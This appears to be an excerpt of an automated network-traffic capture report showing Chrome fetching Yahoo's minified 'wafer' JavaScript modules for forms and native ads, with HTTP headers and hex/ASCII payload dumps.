                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 66 6f 72 6d 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 66 6f 72 6d 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d 2c 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-form",[],t):"object"==typeof exports?exports["wafer-form"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 2b 7b 30 3a 22 34 63 36 34 39 34 39 39 35 37 22 7d 5b 65 5d 2b 22 2e 63 68 75 6e 6b 2e 6a 73 22 3b 76 61 72 20 75 3d 73 65 74 54 69 6d 65 6f 75 74 28 72 2c 31 32 65 34 29 3b 72 65 74 75 72 6e 20 73 2e 6f 6e 65 72 72 6f 72 3d 73 2e 6f 6e 6c 6f 61 64 3d 72 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 29 2c 6f 7d 2c 74 2e 6d 3d 65 2c 74 2e 63 3d 6e 2c 74 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 6e 29 7b 74 2e 6f 28 65 2c 72 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 72 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 31 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 6e 7d 29 7d 2c 74 2e 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 66 75 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: +{0:"4c64949957"}[e]+".chunk.js";var u=setTimeout(r,12e4);return s.onerror=s.onload=r,a.appendChild(s),o},t.m=e,t.c=n,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?fun
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 74 75 72 6e 21 74 7c 7c 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 74 3f 65 3a 74 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 74 26 26 6e 75 6c 6c 21 3d 3d 74 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 2c 20 6e 6f 74 20 22 2b 74 79 70 65 6f 66 20 74 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: turn!t||"object"!=typeof t&&"function"!=typeof t?e:t}function u(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 64 45 76 65 6e 74 2c 4f 3d 70 2e 75 72 6c 69 66 79 2c 6b 3d 5b 22 68 61 6e 64 6c 65 53 75 62 6d 69 74 22 2c 22 68 61 6e 64 6c 65 4f 6e 43 68 61 6e 67 65 22 2c 22 68 61 6e 64 6c 65 4f 6e 53 75 62 6d 69 74 22 5d 2c 4c 3d 5b 22 61 63 74 69 6f 6e 22 2c 22 66 6f 63 75 73 22 5d 2c 54 3d 22 77 61 66 65 72 2d 66 6f 72 6d 2d 62 6f 75 6e 64 61 72 79 2d 65 72 72 6f 72 22 2c 6a 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 2e 63 68 65 63 6b 56 61 6c 69 64 69 74 79 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: dEvent,O=p.urlify,k=["handleSubmit","handleOnChange","handleOnSubmit"],L=["action","focus"],T="wafer-form-boundary-error",j="function"==typeof document.createElement("input").checkValidity,P=function(e){function t(e){var r=arguments.length>1&&void 0!==arg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 74 65 78 74 61 72 65 61 22 29 29 29 2c 42 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 74 72 69 67 67 65 72 2d 73 75 62 6d 69 74 22 29 7d 29 2c 75 2e 5f 75 74 69 6c 3d 6c 28 7b 7d 2c 75 2e 5f 75 74 69 6c 2c 7b 61 63 74 69 6f 6e 3a 63 2c 62 6f 75 6e 64 61 72 79 3a 66 2c 63 61 63 68 65 3a 6e 75 6c 6c 3d 3d 3d 6d 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6d 3f 30 3a 4e 75 6d 62 65 72 28 6d 29 2c 63 72 69 74 69 63 61 6c 3a 70 2c 63 75 73 74 6f 6d 53 75 63 63 65 73 73 43 6c 61 73 73 3a 76 2c 74 61 72 67 65 74 45 6c 65 6d 3a 53 26 26 28 56 7c 7c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 53 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: getElementsByTagName("textarea"))),B.forEach(function(e){e.classList.add("trigger-submit")}),u._util=l({},u._util,{action:c,boundary:f,cache:null===m||void 0===m?0:Number(m),critical:p,customSuccessClass:v,targetElem:S&&(V||document.body).querySelector(S)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 74 43 68 61 6e 67 65 29 2c 67 28 74 2c 22 6b 65 79 64 6f 77 6e 22 2c 65 2e 68 61 6e 64 6c 65 49 6e 70 75 74 43 68 61 6e 67 65 2c 7b 70 61 73 73 69 76 65 3a 21 31 7d 29 29 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 74 3d 74 68 69 73 2e 5f 75 74 69 6c 2c 72 3d 74 2e 65 6c 65 6d 3b 74 2e 65 6c 65 6d 73 57 69 74 68 4f 6e 43 68 61 6e 67 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 67 28 74 2c 22 63 68 61 6e 67 65 22 2c 65 2e 68 61 6e 64 6c 65 4f 6e 43 68 61 6e 67 65 29 7d 29 2c 67 28 72 2c 22 73 75 62 6d 69 74 22 2c 74 68 69 73 2e 68 61 6e 64 6c 65 4f 6e 53 75 62 6d 69 74 2c 7b 70 61 73 73 69 76 65 3a 21 31 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: tChange),g(t,"keydown",e.handleInputChange,{passive:!1}))})}},{key:"addEventListeners",value:function(){var e=this,t=this._util,r=t.elem;t.elemsWithOnChange.forEach(function(t){g(t,"change",e.handleOnChange)}),g(r,"submit",this.handleOnSubmit,{passive:!1}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 54 6f 46 6f 63 75 73 26 26 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 5f 75 74 69 6c 2e 65 6c 65 6d 65 6e 74 54 6f 46 6f 63 75 73 2e 66 6f 63 75 73 28 29 7d 2c 31 30 30 29 7d 7d 2c 7b 6b 65 79 3a 22 5f 68 61 6e 64 6c 65 43 75 73 74 6f 6d 56 61 6c 69 64 61 74 69 6f 6e 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 3b 69 66 28 65 29 7b 69 66 28 21 74 68 69 73 2e 5f 75 74 69 6c 2e 68 61 73 43 75 73 74 6f 6d 45 76 65 6e 74 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 72 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 65 6c 65 6d 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 69 29 7b 67 28 72 2c 22 63 75 73 74 6f 6d 56 61 6c 69 64 61 74 65 53 74 61 74 75 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ToFocus&&setTimeout(function(){e._util.elementToFocus.focus()},100)}},{key:"_handleCustomValidation",value:function(e){var t=this;if(e){if(!this._util.hasCustomEvent)return e;var r=this._util.elem;return new Promise(function(n,i){g(r,"customValidateStatus
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 30 5d 3a 7b 7d 2c 6e 3d 72 2e 76 61 6c 75 65 73 3b 72 65 74 75 72 6e 20 74 2e 5f 73 74 61 74 65 2e 73 75 62 6d 69 74 41 6c 6c 6f 77 65 64 3f 28 65 26 26 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 6e 29 3a 28 66 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 77 61 66 65 72 2d 66 6f 72 6d 2d 69 6e 63 6f 6d 70 6c 65 74 65 22 29 2c 66 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 77 61 66 65 72 2d 66 6f 72 6d 2d 69 6e 70 72 6f 67 72 65 73 73 22 29 2c 76 6f 69 64 28 74 2e 5f 75 74 69 6c 2e 70 65 6e 64 69 6e 67 3d 21 31 29 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 5f 68 61 6e 64 6c 65 43 75 73 74 6f 6d 56 61 6c 69 64 61 74 69 6f 6e 28 65 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0]:{},n=r.values;return t._state.submitAllowed?(e&&e.preventDefault(),n):(f.classList.add("wafer-form-incomplete"),f.classList.remove("wafer-form-inprogress"),void(t._util.pending=!1))}).then(function(e){return t._handleCustomValidation(e)}).then(function
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 75 74 69 6c 2e 70 65 6e 64 69 6e 67 3d 21 31 2c 21 74 2e 5f 64 65 73 74 72 6f 79 65 64 29 72 65 74 75 72 6e 20 6d 2e 65 6d 69 74 45 72 72 6f 72 28 7b 6e 61 6d 65 3a 22 57 61 66 65 72 46 6f 72 6d 22 2c 65 6c 65 6d 3a 66 2c 6d 65 74 61 3a 7b 75 72 6c 3a 41 2c 62 6f 64 79 3a 45 7d 2c 73 74 61 63 6b 3a 65 2e 73 74 61 63 6b 7c 7c 65 2e 6d 65 73 73 61 67 65 7d 29 2c 66 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 77 61 66 65 72 2d 66 6f 72 6d 2d 69 6e 70 72 6f 67 72 65 73 73 22 29 2c 66 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 64 29 2c 69 26 26 69 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 6f 29 2c 21 31 7d 29 7d 7d 29 7d 7d 7d 7d 2c 7b 6b 65 79 3a 22 64 65 73 74 72 6f 79 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: util.pending=!1,!t._destroyed)return m.emitError({name:"WaferForm",elem:f,meta:{url:A,body:E},stack:e.stack||e.message}),f.classList.remove("wafer-form-inprogress"),f.classList.add(d),i&&i.classList.add(o),!1})}})}}}},{key:"destroy",value:function(){var e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 69 73 3b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 73 75 62 6d 69 74 46 6f 72 6d 28 29 7d 2c 31 30 30 29 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 4f 6e 53 75 62 6d 69 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 53 75 62 6d 69 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 73 75 62 6d 69 74 46 6f 72 6d 28 29 7d 7d 2c 7b 6b 65 79 3a 22 66 6f 72 6d 56 61 6c 75 65 73 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 74 3d 74 68 69 73 2e 5f 75 74 69 6c 7c 7c 7b 7d 2c 72 3d 74 2e 65 6c 65 6d 73 57 69 74 68 56 61 6c 75 65 73 2c 6e 3d 76 6f 69 64 20 30
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: is;setTimeout(function(){e.submitForm()},100)}},{key:"handleOnSubmit",value:function(e){e.preventDefault()}},{key:"handleSubmit",value:function(){this.submitForm()}},{key:"formValues",get:function(){var e=this,t=this._util||{},r=t.elemsWithValues,n=void 0


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              128192.168.2.45115187.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC542OUTGET /aaq/wf/wf-native-da-1.0.5-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC693INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: VOZ9A3npCttxqbxTSIJwSbsNOSBOARyBynJzz4PTKr/pka/JkajUI97zjmFGyU5fCUI1EY0zicg=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: YK5S14A64QAHWQBX
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 13 Mar 2024 00:20:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "b29975904d91fe6ff597a7fd5a315391"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: 078ylwgkz5Ax5V37JvikKo6D_ggB.CfO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 11230
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC607INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 6e 61 74 69 76 65 2d 64 61 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 6e 61 74 69 76 65 2d 64 61 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-native-da",[],t):"object"==typeof exports?exports["wafer-native-da"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 6e 7d 29 7d 2c 74 2e 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 2e 64 65 66 61 75 6c 74 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 3b 72 65 74 75 72 6e 20 74 2e 64 28 72 2c 22 61 22 2c 72 29 2c 72 7d 2c 74 2e 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 74 29 7d 2c 74 2e 70 3d 22 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 61 61 71 2f 77 66 2f 22 2c 74 28 74 2e 73 3d 22 2e 2f 73 72 63 2f 65 6e 74 72 79 2e 6a 73 22 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: merable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 3b 76 61 72 20 66 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: &t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}Object.defineProperty(t,"__esModule",{value:!0});var f=Object.assign||function(e){for(var t=1;t<arguments.l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC196INData Raw: 2c 69 3d 72 2e 6e 61 74 69 76 65 44 61 43 6f 6e 66 69 67 2c 61 3d 72 2e 65 72 72 6f 72 43 6c 61 73 73 2c 73 3d 72 2e 73 65 6c 65 63 74 6f 72 2c 63 3d 72 2e 73 75 63 63 65 73 73 43 6c 61 73 73 3b 6e 28 74 68 69 73 2c 74 29 3b 76 61 72 20 75 3d 6f 28 74 68 69 73 2c 28 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 29 2e 63 61 6c 6c 28 74 68 69 73 2c 65 2c 7b 65 72 72 6f 72 43 6c 61 73 73 3a 61 2c 73 65 6c 65 63 74 6f 72 3a 73 2c 73 75 63 63 65 73 73 43 6c 61 73 73 3a 63 7d 2c 7b 53 54 41 54 45 5f 41 54 54 52 53 3a 5f 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ,i=r.nativeDaConfig,a=r.errorClass,s=r.selector,c=r.successClass;n(this,t);var u=o(this,(t.__proto__||Object.getPrototypeOf(t)).call(this,e,{errorClass:a,selector:s,successClass:c},{STATE_ATTRS:_}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 29 29 2c 76 3d 62 28 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 6e 61 74 69 76 65 2d 64 61 2d 63 6f 6e 66 69 67 22 29 5b 30 5d 29 2c 64 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 79 2b 22 6e 61 74 69 76 65 2d 64 61 2d 74 61 62 6f 6f 6c 61 2d 63 6f 6e 66 69 67 22 29 2c 68 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 79 2b 22 6e 61 74 69 76 65 2d 64 61 2d 69 64 22 29 3b 76 2e 65 6e 61 62 6c 65 54 61 62 6f 6f 6c 61 41 64 73 7c 7c 64 7c 7c 28 68 3d 68 2b 22 2d 22 2b 20 2b 2b 43 29 2c 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 79 2b 22 6e 61 74 69 76 65 2d 64 61 2d 69 64 22 2c 68 29 3b 76 61 72 20 67 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 79 2b 22 6e 61 74 69 76 65 2d 64 61 2d 74 79 70 65 22 29 7c 7c 22 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: )),v=b(e.getElementsByClassName("native-da-config")[0]),d=e.getAttribute(y+"native-da-taboola-config"),h=e.getAttribute(y+"native-da-id");v.enableTaboolaAds||d||(h=h+"-"+ ++C),e.setAttribute(y+"native-da-id",h);var g=e.getAttribute(y+"native-da-type")||"n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 75 74 2c 5f 3d 70 2e 75 72 6c 3b 72 65 74 75 72 6e 20 30 21 3d 3d 74 68 69 73 2e 5f 73 74 61 74 65 2e 73 74 61 74 75 73 3f 28 74 2e 73 65 74 46 65 74 63 68 49 6e 50 72 6f 67 72 65 73 73 28 6e 29 2c 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 77 61 66 65 72 2d 6e 61 74 69 76 65 2d 64 61 2d 74 72 69 67 67 65 72 2d 69 6e 70 72 6f 67 72 65 73 73 22 29 2c 74 68 69 73 2e 5f 73 74 61 74 65 2e 73 74 61 74 75 73 3d 30 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 76 61 72 20 6f 3d 74 2e 67 65 74 28 61 29 3b 69 66 28 6f 29 72 65 74 75 72 6e 20 6f 2e 5f 73 74 6f 72 61 67 65 53 6f 75 72 63 65 3d 22 70 72 65 66 65 74 63 68 22 2c 76 6f 69 64 20 65 28 6f 29 3b 50 3d 50 7c 7c 77 69 6e 64 6f 77 2e 72 61 70 69 64 49 6e 73 74 61 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ut,_=p.url;return 0!==this._state.status?(t.setFetchInProgress(n),c.classList.add("wafer-native-da-trigger-inprogress"),this._state.status=0,new Promise(function(e,r){var o=t.get(a);if(o)return o._storageSource="prefetch",void e(o);P=P||window.rapidInstan
